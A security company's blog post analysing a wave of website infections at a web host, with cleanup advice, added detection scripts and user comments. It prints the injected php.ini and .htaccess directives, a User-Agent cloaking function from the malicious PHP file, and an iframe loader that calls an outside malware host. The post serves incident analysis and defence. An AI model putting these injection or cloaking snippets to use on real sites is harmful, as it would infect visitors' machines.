New infections today at Network Solutions

Update: We just heard back from Network solutions and they explained the issue to us. It is also related to the US Treasury Department hack, because they are hosting at Netsol and got infected too.

In their own words: “This past weekend, an application that we support on our hosting platform was exploited as we were in the process of fixing it. We believe we have fixed the issue and we were able to contain the number of potentially affected websites to less than 250.”

So the problem seems to be fixed and only 250 sites got hacked. Not too bad for a company of their size.

I also have to point out that Network Solutions' response to this (and to the previous) incident was very good. They took responsibility, kept everyone updated and worked hard to fix the sites involved. There is never going to be a perfectly secure hosting solution (bugs happen), but being able to respond quickly is what we always want to see.

Yes, I am tired of reporting these, as you are probably tired of hearing about them as well. But today we got reports from multiple site owners of new infections at Network Solutions. Some of them were using WordPress, but some were not, so nobody can blame WordPress this time.

In fact, we just finished fixing a few of these sites and we have some info to share.

*btw, some of them were hacked in the previous batch, but some were not. No correlation here.

**I am not 100% sure how this is happening. Different sites, different platforms, most of them updated. The only weird thing is that their cgi-bin had the mode drwxrws--x (suid bit set). I will post an update when I get more info.

Attack analysis

This attack is happening in two ways:

1- A new php.ini is created inside the cgi-bin directory. It looks like this:

auto_append_file = /data/xx/yy//user/abc/cgi-bin/root

2- A new .htaccess is created (or modified) to load a new php file:

RewriteRule ^(.*)\.html$ /data/xx/user/yy/htdocs/file.php [L]
RewriteRule ^(.*)\.htm$ /data/xx/user/yy/htdocs/file.php [L]

Note that I am hiding the original paths to protect the innocent. Also, the “file.php” from the second case had a different file name in each case.

The “root” file inside the cgi-bin looks like the “counter.cgi” that we saw previously.
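To check a hosting account for the three indicators described above (a php.ini in cgi-bin that sets auto_append_file, a .htaccess RewriteRule that sends .html/.htm requests to a PHP file, and a setgid cgi-bin directory), here is an added Python script. It is not Sucuri's scanner and not part of the original post; the sample account layout it builds in a temporary directory is constructed from the anonymised paths shown above, and the regular expressions are assumptions about how the directives are written.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# Added example (not Sucuri's scanner): looks for the three indicators the post
# describes in a hosting account's files.
#  1. a php.ini whose auto_append_file / auto_prepend_file points at a script
#  2. a .htaccess RewriteRule that sends *.html / *.htm requests to a .php file
#  3. a cgi-bin directory with the setgid bit set (the "drwxrws--x" mode)
INI_DIRECTIVE = re.compile(r'^\s*(auto_(?:append|prepend)_file)\s*=\s*(.+?)\s*$',
                           re.IGNORECASE | re.MULTILINE)
REWRITE_TO_PHP = re.compile(r'^\s*RewriteRule\s+(\S+)\s+(\S*\.php\S*)',
                            re.IGNORECASE | re.MULTILINE)
HTML_PATTERN = re.compile(r'\\?\.html?\$', re.IGNORECASE)


def scan_php_ini(text):
    """Return (directive, value) pairs for every auto_*_file setting in a php.ini."""
    return [(m.group(1).lower(), m.group(2)) for m in INI_DIRECTIVE.finditer(text)]


def scan_htaccess(text):
    """Return (pattern, target) pairs for RewriteRules that map .html/.htm URLs to PHP."""
    return [(m.group(1), m.group(2)) for m in REWRITE_TO_PHP.finditer(text)
            if HTML_PATTERN.search(m.group(1))]


def scan_tree(root):
    """Walk a web root; return (path, indicator, detail) tuples for everything found."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        d = Path(dirpath)
        mode = d.stat().st_mode
        if d.name == 'cgi-bin' and mode & stat.S_ISGID:
            findings.append((str(d), 'setgid-cgi-bin', stat.filemode(mode)))
        for name in filenames:
            p = d / name
            if name == 'php.ini':
                for directive, value in scan_php_ini(p.read_text(errors='replace')):
                    findings.append((str(p), directive, value))
            elif name == '.htaccess':
                for pattern, target in scan_htaccess(p.read_text(errors='replace')):
                    findings.append((str(p), 'rewrite-to-php', f'{pattern} -> {target}'))
    return findings


def build_sample_tree(base):
    """Write a constructed account layout using the anonymised paths from the post."""
    base = Path(base)
    (base / 'cgi-bin').mkdir(parents=True)
    (base / 'htdocs').mkdir()
    (base / 'cgi-bin' / 'php.ini').write_text(
        'auto_append_file = /data/xx/yy//user/abc/cgi-bin/root\n')
    (base / 'htdocs' / '.htaccess').write_text(
        'RewriteEngine On\n'
        'RewriteRule ^(.*)\\.html$ /data/xx/user/yy/htdocs/file.php [L]\n'
        'RewriteRule ^(.*)\\.htm$ /data/xx/user/yy/htdocs/file.php [L]\n'
        'RewriteRule ^old/(.*)$ /new/$1 [R=301,L]\n')  # benign rule, must not be flagged
    return base


def demo_scan():
    """Build the constructed sample tree in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_tree(build_sample_tree(tmp))


if __name__ == '__main__':
    for path, kind, detail in demo_scan():
        print(f'{kind:16} {path}: {detail}')
```

Run it against a real account with scan_tree('/path/to/account'); the benign redirect rule in the sample shows that ordinary RewriteRules are not reported, only those that route static-looking URLs into PHP.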

The file.php is very interesting and you can see its full content here: http://sucuri.net/malware/MW:GREPADD:2. It not only checks whether the request is coming from a bot, but also the operating system (Linux, FreeBSD, etc.), and only displays the malware in certain cases:

// Excerpt of file.php: classifies the visitor by User-Agent so the payload can be cloaked
// (ereg/eregi are PHP 4/5 functions, removed in PHP 7)
function detect_os() {
global $os;
$user_agent = $_SERVER['HTTP_USER_AGENT'];
if ((eregi("Google", $user_agent))
or (eregi("gsa-crawler", $user_agent))
or (eregi("Yahoo", $user_agent))
or (eregi("msnbot", $user_agent))
or (eregi("Turtle", $user_agent))
or (eregi("Yandex", $user_agent))
or (eregi("YaDirectBot", $user_agent))
or (eregi("Rambler", $user_agent))
or (eregi("James Bond", $user_agent))
or (eregi("Ask Jeeves", $user_agent))
or (eregi("Baiduspider", $user_agent))
or (eregi("EltaIndexer", $user_agent))
or (eregi("GameSpyHTTP", $user_agent))
or (eregi("grub-client", $user_agent))
or (eregi("Slurp", $user_agent))
or (eregi("Pagebull", $user_agent))
or (eregi("Scooter", $user_agent))
or (eregi("Nutch", $user_agent))
or (eregi("Zeus", $user_agent))
or (eregi("WebAlta", $user_agent))
or (eregi("Wget", $user_agent))
or (eregi("bot", $user_agent))
or (eregi("ia_archiver", $user_agent)))
{$os = "Bots";}
elseif (ereg("Windows 95", $user_agent)) $os = "Windows 95";
elseif (ereg("Windows NT 4", $user_agent)) $os = "Windows NT 4";
elseif (ereg("Windows 98", $user_agent)) $os = "Windows 98";
elseif (ereg("Win 9x 4.9", $user_agent)) $os = "Windows ME";
elseif (ereg("Windows NT 5.0", $user_agent)) $os = "Windows 2000";
elseif (ereg("Windows NT 5.1", $user_agent)) $os = "Windows XP";
elseif (ereg("Windows NT 5.2", $user_agent)) $os = "Windows 2003";
elseif (ereg("Windows NT 6.0", $user_agent)) $os = "Windows Vista";
elseif (ereg("Windows NT 6.1", $user_agent)) $os = "Windows 7";
elseif (ereg("Windows CE", $user_agent)) $os = "Windows CE";
elseif (ereg("iPhone", $user_agent)) $os = "iPhone OS";
elseif (ereg("Symbian", $user_agent)) $os = "Symbian OS";
elseif (ereg("Linux", $user_agent)) $os = "Linux";
elseif (ereg("SunOS", $user_agent)) $os = "SunOS";
elseif (ereg("FreeBSD", $user_agent)) $os = "FreeBSD";
elseif (ereg("NetBSD", $user_agent)) $os = "NetBSD";
elseif (ereg("PPC;", $user_agent)) $os = "Pocket PC";
elseif ((ereg("PPC", $user_agent)) or (eregi("Mac_PowerPC", $user_agent))) $os = "Power PC";
elseif (ereg("Mac OS", $user_agent)) $os = "Mac OS";
elseif (eregi("PlayStation", $user_agent)) $os = "PlayStation";
elseif (ereg("Nintendo Wii", $user_agent)) $os = "Nintendo Wii";
elseif (ereg("Nitro", $user_agent)) $os = "Nintendo DS";
elseif (ereg("J2ME/MIDP", $user_agent)) $os = "Mobile phone";
else $os = "Unknown OS :(";
}

At the end both show the same iframe to load malware:

document.write('<iframe frameborder="0" onload="">
if (!this.src){ this.src="http://grepad.com/in.cgi?2"; this.height=0; this.width=0;} \'</iframe>
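Because detect_os() serves different content depending on the User-Agent, a site owner who only checks the page with a browser, or only with a scanner that announces itself as a bot, can miss the injection. The added Python script below (not from the post, and not Sucuri's scanner) fetches the same URL as a search-engine bot and as a desktop browser and reports third-party hosts that appear in one view but not the other. The sample pages it compares offline are constructed; the injected host malicious.example is a placeholder, not an indicator from the post.

```python
import re
import urllib.request
from urllib.parse import urlparse

# Added example (not from the post): fetch the same page under two User-Agents
# and compare which third-party hosts each view references. A cloaked injection
# like the one in file.php shows up as a host present in one view only.
USER_AGENTS = {
    'bot': 'Googlebot/2.1 (+http://www.google.com/bot.html)',
    'browser': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0 Safari/537.36',
}
# Absolute http(s) URLs; stop at whitespace, quotes, angle brackets, ')' and backslash.
URL_RE = re.compile(r'https?://[^\s"\'<>)\\]+', re.IGNORECASE)


def third_party_hosts(html, site_host):
    """Hosts referenced by absolute URLs in html, excluding the site's own host."""
    hosts = set()
    for url in URL_RE.findall(html):
        host = urlparse(url).hostname
        if host and host.lower() != site_host.lower():
            hosts.add(host.lower())
    return hosts


def cloaking_diff(views, site_host):
    """views: {label: html}. Return {label: third-party hosts seen only in that view}."""
    per_view = {label: third_party_hosts(html, site_host) for label, html in views.items()}
    common = set.intersection(*per_view.values()) if per_view else set()
    return {label: hosts - common for label, hosts in per_view.items()}


def fetch(url, user_agent):
    """Fetch url with a given User-Agent (needs network; not used by the offline demo)."""
    req = urllib.request.Request(url, headers={'User-Agent': user_agent})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode('utf-8', errors='replace')


def check_site(url):
    """Fetch url once per User-Agent and return the per-view differences."""
    views = {label: fetch(url, ua) for label, ua in USER_AGENTS.items()}
    return cloaking_diff(views, urlparse(url).hostname)


# Constructed sample views: the bot view is clean; the browser view carries an
# injected iframe in the style the post shows (malicious.example is a placeholder).
SAMPLE_HOST = 'www.example.com'
CLEAN_PAGE = ('<html><body><a href="http://www.example.com/about.html">About</a>'
              '<script src="http://cdn.example.net/jquery.js"></script></body></html>')
INJECTED_PAGE = CLEAN_PAGE + (
    "<script>document.write('<iframe frameborder=\"0\" onload=\"if (!this.src){"
    " this.src=\\'http://malicious.example/in.cgi?2\\'; this.height=0; this.width=0;}\">"
    "</iframe>');</script>")


def demo():
    """Compare the constructed bot and browser views of the sample page."""
    return cloaking_diff({'bot': CLEAN_PAGE, 'browser': INJECTED_PAGE}, SAMPLE_HOST)


if __name__ == '__main__':
    for label, hosts in demo().items():
        print(f'{label}: hosts only in this view = {sorted(hosts)}')
```

For a live check call check_site('http://your-site.example/'); any host listed under one label only deserves a look, since legitimate pages normally load the same third-party resources regardless of who is asking.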

If you got infected, look at your php.ini or .htaccess file and remove the bad entries. If you are not sure, use our scanner to check it out.

Have more information? Let us know!

As always, if you need help to recover from this attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • Anonymous

    We got infected.

    This is the WILDLY HELPFUL response from Network Solutions:

    I am sorry to hear that you were experiencing an issue with malware on your website. I have removed the offending code and the file to which it was linking. I have also enabled the raw access logs on your hosting package so, if this occurs again, we can gain insight into how it may have happened. You may also want to reset your FTP password and use sFTP rather than regular FTP, as this change was made after the last time your FTP password was reset.

  • Anonymous

    This is getting ridiculous.

  • Anonymous

    Any chance these installations are customers who haven't logged into their accounts and checked or updated their blogs since January? Or even last year?

    This is a big concern for those of us trying to operate professional and secure blogs.

  • Anonymous

    A new .htaccess is created

    That's not a good sign at all. How are they inserting this stuff into shared hosting accounts? This is crazy.

  • Anonymous

    We just got infected… Such a nightmare, Network Solutions is awful…

    This is coming off last week where we were not receiving email for a full day.

  • Anonymous

    Plenty of tips here to clean up one's site, but there doesn't seem to be any info out there for us simple websurfers who started to see the fazher.com redirect. And the Application Data/Mozilla directory being (re-)created and seeing some malicious files in said directory that Norton can't remove. Malwarebytes seems to delete these files, but they may return (previously I deleted the Mozilla directory in Documents and Settings' Application Data directory manually only to see them return).

    So any instructions to affected websites' visitors?

    What are the effects of this trojan? Does it send out spam or other malicious data that will lead to your ISP cutting you off?

  • Anonymous

    So any instructions to affected websites' visitors?

    Duck and cover. That's about all I can think of at this point. Other than maybe considering a safer and possibly more lucrative venture such as raising earthworms or bees.

  • Anonymous

    What's the bottom line here, guys? Is this all-out cyber warfare against NS and GD, and us little guys are basically powerless to do anything?

    Seriously, what's going on here? They even hit the U.S. Treasury sites on NS now.

  • Anonymous

    Are we fixed yet?

  • Anonymous

    Diagnostic page for AS6245
    The last time Google tested a site on this network was on 2010-05-05, and the last time suspicious content was found was on 2010-05-05.

    Still contaminated obviously.

  • Anonymous

    You need to scan your computers. Checking your own websites will give you trojans. I've discovered 8 new ones since the week of April 18.

    twitters.class
    mailvue.class
    skypeqd.class
    ifology.class

    uutecwv.class
    hirwfee.class
    hiydcxed.class
    hieeyfac.class

    They were downloaded in sets of four. One set on the first day I was hacked, and the second set the second day I was hacked. Either I downloaded these with backups I made of my site, or they downloaded and got past my firewall as I was checking out and clicking through the pages on my sites.

  • Anonymous

    I wouldn't say their response has been acceptable let alone good.

    During the initial round of hacks, they emphatically blamed the issue on WordPress and now are using backups to "restore" clients sites that may or may not have been hacked, the backups which do not include all of the files which I now need to re-create for a client.

    To top it all off, I can't even log onto their server at this time.

    Yes, no hosting company can be 100% secure but this has gotten past ridiculous.

  • Anonymous

    Yes, no hosting company can be 100% secure but this has gotten past ridiculous.
    ………..

    I've been working 24/7 since late April just trying to keep things together. Looks like I only have one option: ask them to "reprovision" my account, to recreate it as though it is brand new and start from scratch.

    All my work seems to be hopelessly screwed up.

  • Anonymous

    Okay,

    Now that it's obvious my entire development project (3 months work) has been basically destroyed.

    What's the solution? Do I need to go to a VPS to have at least some basic protection?

  • Anonymous

    Mail's not working. I try to send mail from my contact page and it vanishes into thin air.

  • Anonymous

    If the US Treasury Department got hacked at Network Solutions, no one is 100% safe. I have been going insane since April 19. After the site gets cleaned, 72 hrs later the site gets hacked again. On my last cleaning I found multiple .htaccess files that were compromised, including one inside the raw access logs and awstats folder. I disabled these features, deleted the .htaccess files and changed the FTP password ASAP, I mean ASAP, plus reset file permissions. The site has not been attacked in 3 days, so I am keeping my fingers crossed.

  • Anonymous

    I have been going insane since April 19.

    Welcome to the club. At this rate I'll be lucky if my wife doesn't divorce me over this fiasco.
    I'm afraid to even go to my own site anymore for fear something might jump out of the screen at me.

  • Anonymous

    I got a brand new .htaccess attack this morning (this is my 3rd in two weeks).
